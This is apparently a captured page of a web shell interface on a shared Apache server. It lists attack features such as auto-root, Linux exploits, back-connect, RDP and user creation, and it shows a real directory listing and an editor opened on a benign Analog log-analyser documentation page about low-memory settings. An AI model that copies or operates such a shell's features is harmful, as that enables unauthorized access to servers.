Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
analog /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
LicBSD.txt
1.76
KB
-rw-r--r--
Licbzip2.txt
1.7
KB
-rw-r--r--
Licgd.txt
2.2
KB
-rw-r--r--
Licpcre.txt
1.02
KB
-rw-r--r--
Licpng.txt
2.36
KB
-rw-r--r--
Licunzip.txt
1.29
KB
-rw-r--r--
Liczlib.txt
1.68
KB
-rw-r--r--
Readme.html
3.53
KB
-rw-r--r--
acknow.html
8.21
KB
-rw-r--r--
alias.html
10.18
KB
-rw-r--r--
analogo.gif
567
B
-rw-r--r--
anlgdocs.css
147
B
-rw-r--r--
args.html
9.26
KB
-rw-r--r--
bara8.gif
50
B
-rw-r--r--
barb1.gif
67
B
-rw-r--r--
barb32.gif
165
B
-rw-r--r--
barb8.gif
100
B
-rw-r--r--
barc8.gif
145
B
-rw-r--r--
bard8.gif
76
B
-rw-r--r--
bare8.gif
142
B
-rw-r--r--
barf8.gif
76
B
-rw-r--r--
barg8.gif
175
B
-rw-r--r--
barh8.gif
194
B
-rw-r--r--
bari8.gif
103
B
-rw-r--r--
barj8.gif
185
B
-rw-r--r--
basiccmd.html
7.88
KB
-rw-r--r--
cache.html
9.51
KB
-rw-r--r--
compout.html
6.14
KB
-rw-r--r--
custom.html
2.72
KB
-rw-r--r--
debug.html
6.93
KB
-rw-r--r--
defns.html
7.26
KB
-rw-r--r--
dns.html
6.36
KB
-rw-r--r--
domfile.html
4.16
KB
-rw-r--r--
errors.html
16.22
KB
-rw-r--r--
faq.html
49.66
KB
-rw-r--r--
favicon.ico
1.05
KB
-rw-r--r--
form.html
23.35
KB
-rw-r--r--
helpers.html
1.74
KB
-rw-r--r--
hierreps.html
7.86
KB
-rw-r--r--
include.html
13.8
KB
-rw-r--r--
indx.html
37.54
KB
-rw-r--r--
logfile.html
17.3
KB
-rw-r--r--
logfmt.html
17.78
KB
-rw-r--r--
lowmem.html
3.91
KB
-rw-r--r--
mailing.html
8
KB
-rw-r--r--
map.html
3.22
KB
-rw-r--r--
meaning.html
1.82
KB
-rw-r--r--
othreps.html
17.35
KB
-rw-r--r--
output.html
22.66
KB
-rw-r--r--
quickref.html
40.12
KB
-rw-r--r--
reports.html
15.05
KB
-rw-r--r--
start.html
2.15
KB
-rw-r--r--
startmac.html
3.66
KB
-rw-r--r--
startpc.html
4.29
KB
-rw-r--r--
startux.html
5.67
KB
-rw-r--r--
syntax.html
7.1
KB
-rw-r--r--
timereps.html
7.53
KB
-rw-r--r--
update.html
25.37
KB
-rw-r--r--
wasnew1.html
5.5
KB
-rw-r--r--
wasnew2.html
7.79
KB
-rw-r--r--
wasnew3.html
12.48
KB
-rw-r--r--
wasnew4.html
10.67
KB
-rw-r--r--
wasnew5.html
16.28
KB
-rw-r--r--
webworks.html
13.78
KB
-rw-r--r--
whatsnew.html
4.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lowmem.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head> <link rel=stylesheet type="text/css" href="anlgdocs.css"> <LINK REL="SHORTCUT ICON" HREF="favicon.ico"> <title>Readme for analog -- coping with low memory</title> </head> <body> [ <a href="Readme.html">Top</a> | <a href="custom.html">Up</a> | <a href="dns.html">Prev</a> | <a href="debug.html">Next</a> | <a href="map.html">Map</a> | <a href="indx.html">Index</a> ] <h1><img src="analogo.gif" alt=""> Analog 6.0: Coping with low memory</h1> <hr size=2 noshade> This section describes how to run analog with lower amounts of memory. For a normal logfile this will make analog run a bit slower. But if your computer is running out of memory when running analog, it will go very slowly indeed: so for large logfiles, this can make analog run much faster, or even make an analysis possible that wouldn't otherwise be possible. <p> Recall what happens to an item when it has been read in. First it is <a href="alias.html">aliased</a>. Secondly, it is checked to see whether it is <a href="include.html">included or excluded</a>. Then finally, if all the items are wanted, one request is added to its score. <p> Normally the name of the item is saved before the aliasing takes place. This avoids analog having to do the aliasing again next time the same item is encountered. But this can take up more memory than necessary. So there is a family of <kbd>LOWMEM</kbd> commands provided, which tell analog to record the name at a later stage, or even not at all. If you use these commands, analog will have to do a bit more work than normal, but it will use less memory. On most sites, the hosts take up most of the memory, so I'll use the <kbd>HOSTLOWMEM</kbd> command as an example. <p> The command <pre> HOSTLOWMEM 0 </pre> represents the normal case, when the hostname is recorded before being aliased. If you specify <pre> HOSTLOWMEM 1 </pre> instead, then the hostname is not recorded until after the aliasing. If you specify <pre> HOSTLOWMEM 2 </pre> then the name is not recorded until after the inclusion and exclusion lookup has been done as well. And finally, if you give the command <pre> HOSTLOWMEM 3 </pre> then the hostname is not saved at all, and the Host Report will not be constructed, even if you've asked for it. (The Domain Report can still be constructed though.) The analogous commands for the other items are <kbd>FILELOWMEM</kbd>, <kbd>BROWLOWMEM</kbd>, <kbd>REFLOWMEM</kbd>, <kbd>USERLOWMEM</kbd> and <kbd>VHOSTLOWMEM</kbd>. <hr size=1 noshade> So what should you do if analog runs out of memory? First, look in your logfile to see which items are taking up all the memory. If you have lots of different filenames, ones you generate on the fly for example, you would want to use the <kbd>FILELOWMEM</kbd> commands. Maybe you could combine all the similar filenames into one with a <kbd>FILEALIAS</kbd> command, and use <kbd>FILELOWMEM 1</kbd>. (If you have lots of different filenames caused by different search arguments, then using <kbd><a href="args.html#ARGSINCLUDE">ARGSEXCLUDE</a></kbd> might solve your problem without any need to use <kbd>LOWMEM</kbd> at all). But for most users, it is the hostnames which cause the problem. If you only want to analyse requests from certain hosts, then you could use <kbd>HOSTLOWMEM 2</kbd> to exclude the others before recording those that are left. If you don't want to exclude any hosts, and you haven't got enough memory to record all the different hostnames, then <kbd>HOSTLOWMEM 3</kbd> would be appropriate. <hr size=2 noshade> Go to the <a href="http://www.analog.cx/">analog home page</a>. <p> <address>Stephen Turner <br>19 December 2004</address> <p><em>Need help with analog? <a href="mailing.html">Use the analog-help mailing list</a>.</em> <p> [ <a href="Readme.html">Top</a> | <a href="custom.html">Up</a> | <a href="dns.html">Prev</a> | <a href="debug.html">Next</a> | <a href="map.html">Map</a> | <a href="indx.html">Index</a> ] </body> </html>
Close